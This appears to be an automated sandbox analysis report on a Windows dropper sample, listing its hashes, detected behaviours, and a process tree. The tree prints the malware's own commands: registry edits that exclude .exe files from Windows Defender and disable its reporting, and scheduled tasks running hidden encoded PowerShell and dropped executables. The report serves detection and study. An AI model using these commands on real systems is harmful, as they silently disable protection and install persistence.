Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 12:24
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
28ceb8d72ff0934b39e779a3b6f1c514
-
SHA1
c4731a619c179da43cc1f059e8693a88e9891bf4
-
SHA256
1d260f0670b9c7a24763540bbeadf520d7edd342bcbe9d08d2352cade2502720
-
SHA512
8966a7163f3af92671631558a3bfb6b353778f008334e0346d594a43cb07b9eb2742f80812a8a54cf863e77a9f755e0577e4a4e0c7d0b0ceb873fdbfe2fb0a1f
-
SSDEEP
98304:91OFjm0/1juHbR5cyCJUMlcCOAndwmVXUBNECTb3z9Ob0sSmPFSVlCfdD+0Wvad8:91OFjx9jORHCuiUedHRKuNJNdRX0uXgJ
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 25 4512 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeWaGVnmO.exeapHgcpf.exepid process 1868 Install.exe 2660 Install.exe 3112 WaGVnmO.exe 2464 apHgcpf.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeapHgcpf.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation apHgcpf.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4512 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
Processes:
apHgcpf.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json apHgcpf.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
apHgcpf.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini apHgcpf.exe -
Drops file in System32 directory 29 IoCs
Processes:
apHgcpf.exeInstall.exepowershell.exepowershell.exeWaGVnmO.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 apHgcpf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA apHgcpf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 apHgcpf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WaGVnmO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 apHgcpf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WaGVnmO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA apHgcpf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol apHgcpf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 apHgcpf.exe -
Drops file in Program Files directory 14 IoCs
Processes:
apHgcpf.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja apHgcpf.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi apHgcpf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak apHgcpf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak apHgcpf.exe File created C:\Program Files (x86)\gcyASImYjZBU2\EHRjqBf.xml apHgcpf.exe File created C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\dSXAHiz.dll apHgcpf.exe File created C:\Program Files (x86)\gUXCkMfuWzCyC\ZlgcoCG.dll apHgcpf.exe File created C:\Program Files (x86)\yqOJJFIvHNUn\TdEjZCR.dll apHgcpf.exe File created C:\Program Files (x86)\vCYWhmhlU\fuRnhIw.xml apHgcpf.exe File created C:\Program Files (x86)\FHyUItRmbDQJtgsSWlR\jQdzAOm.xml apHgcpf.exe File created C:\Program Files (x86)\gUXCkMfuWzCyC\vbpmRvB.xml apHgcpf.exe File created C:\Program Files (x86)\vCYWhmhlU\ytnWjB.dll apHgcpf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi apHgcpf.exe File created C:\Program Files (x86)\gcyASImYjZBU2\uyItSnbWYjNBA.dll apHgcpf.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job schtasks.exe File created C:\Windows\Tasks\ehnYTuGzyhWqfGFsn.job schtasks.exe File created C:\Windows\Tasks\ulJHerdNyNJKzGw.job schtasks.exe File created C:\Windows\Tasks\AFcndnMIJqNXhoPDJ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4972 schtasks.exe 1084 schtasks.exe 3576 schtasks.exe 1996 schtasks.exe 3080 schtasks.exe 3196 schtasks.exe 4796 schtasks.exe 3740 schtasks.exe 3200 schtasks.exe 100 schtasks.exe 2592 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exerundll32.exeapHgcpf.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\NukeOnDelete = "0" apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{5d2b4a7c-0000-0000-0000-d01200000000}\MaxCapacity = "15140" apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" apHgcpf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5" apHgcpf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" apHgcpf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEapHgcpf.exepid process 1420 powershell.EXE 1420 powershell.EXE 460 powershell.exe 460 powershell.exe 2016 powershell.exe 2016 powershell.exe 3596 powershell.EXE 3596 powershell.EXE 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe 2464 apHgcpf.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 1420 powershell.EXE Token: SeDebugPrivilege 460 powershell.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 3596 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exepowershell.EXEWaGVnmO.exepowershell.execmd.exedescription pid process target process PID 1544 wrote to memory of 1868 1544 file.exe Install.exe PID 1544 wrote to memory of 1868 1544 file.exe Install.exe PID 1544 wrote to memory of 1868 1544 file.exe Install.exe PID 1868 wrote to memory of 2660 1868 Install.exe Install.exe PID 1868 wrote to memory of 2660 1868 Install.exe Install.exe PID 1868 wrote to memory of 2660 1868 Install.exe Install.exe PID 2660 wrote to memory of 4864 2660 Install.exe forfiles.exe PID 2660 wrote to memory of 4864 2660 Install.exe forfiles.exe PID 2660 wrote to memory of 4864 2660 Install.exe forfiles.exe PID 2660 wrote to memory of 4048 2660 Install.exe forfiles.exe PID 2660 wrote to memory of 4048 2660 Install.exe forfiles.exe PID 2660 wrote to memory of 4048 2660 Install.exe forfiles.exe PID 4048 wrote to memory of 1520 4048 forfiles.exe cmd.exe PID 4048 wrote to memory of 1520 4048 forfiles.exe cmd.exe PID 4048 wrote to memory of 1520 4048 forfiles.exe cmd.exe PID 4864 wrote to memory of 3136 4864 forfiles.exe cmd.exe PID 4864 wrote to memory of 3136 4864 forfiles.exe cmd.exe PID 4864 wrote to memory of 3136 4864 forfiles.exe cmd.exe PID 1520 wrote to memory of 3092 1520 cmd.exe reg.exe PID 1520 wrote to memory of 3092 1520 cmd.exe reg.exe PID 1520 wrote to memory of 3092 1520 cmd.exe reg.exe PID 3136 wrote to memory of 2204 3136 cmd.exe reg.exe PID 3136 wrote to memory of 2204 3136 cmd.exe reg.exe PID 3136 wrote to memory of 2204 3136 cmd.exe reg.exe PID 1520 wrote to memory of 3128 1520 cmd.exe reg.exe PID 1520 wrote to memory of 3128 1520 cmd.exe reg.exe PID 1520 wrote to memory of 3128 1520 cmd.exe reg.exe PID 3136 wrote to memory of 4976 3136 cmd.exe reg.exe PID 3136 wrote to memory of 4976 3136 cmd.exe reg.exe PID 3136 wrote to memory of 4976 3136 cmd.exe reg.exe PID 2660 wrote to memory of 3200 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 3200 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 3200 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 2140 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 2140 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 2140 2660 Install.exe schtasks.exe PID 1420 wrote to memory of 4916 1420 powershell.EXE gpupdate.exe PID 1420 wrote to memory of 4916 1420 powershell.EXE gpupdate.exe PID 2660 wrote to memory of 260 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 260 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 260 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 100 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 100 2660 Install.exe schtasks.exe PID 2660 wrote to memory of 100 2660 Install.exe schtasks.exe PID 3112 wrote to memory of 460 3112 WaGVnmO.exe powershell.exe PID 3112 wrote to memory of 460 3112 WaGVnmO.exe powershell.exe PID 3112 wrote to memory of 460 3112 WaGVnmO.exe powershell.exe PID 460 wrote to memory of 3236 460 powershell.exe cmd.exe PID 460 wrote to memory of 3236 460 powershell.exe cmd.exe PID 460 wrote to memory of 3236 460 powershell.exe cmd.exe PID 3236 wrote to memory of 4468 3236 cmd.exe reg.exe PID 3236 wrote to memory of 4468 3236 cmd.exe reg.exe PID 3236 wrote to memory of 4468 3236 cmd.exe reg.exe PID 460 wrote to memory of 3984 460 powershell.exe reg.exe PID 460 wrote to memory of 3984 460 powershell.exe reg.exe PID 460 wrote to memory of 3984 460 powershell.exe reg.exe PID 460 wrote to memory of 2116 460 powershell.exe reg.exe PID 460 wrote to memory of 2116 460 powershell.exe reg.exe PID 460 wrote to memory of 2116 460 powershell.exe reg.exe PID 460 wrote to memory of 1408 460 powershell.exe reg.exe PID 460 wrote to memory of 1408 460 powershell.exe reg.exe PID 460 wrote to memory of 1408 460 powershell.exe reg.exe PID 460 wrote to memory of 2260 460 powershell.exe reg.exe PID 460 wrote to memory of 2260 460 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\7zS540.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\7zSE19.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4976
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2204
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3128
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3092
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giGpJUrHU" /SC once /ST 07:55:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3200 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giGpJUrHU"4⤵PID:2140
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giGpJUrHU"4⤵PID:260
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 13:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exe\" mF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:3472
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exeC:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\WaGVnmO.exe mF /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3112 -
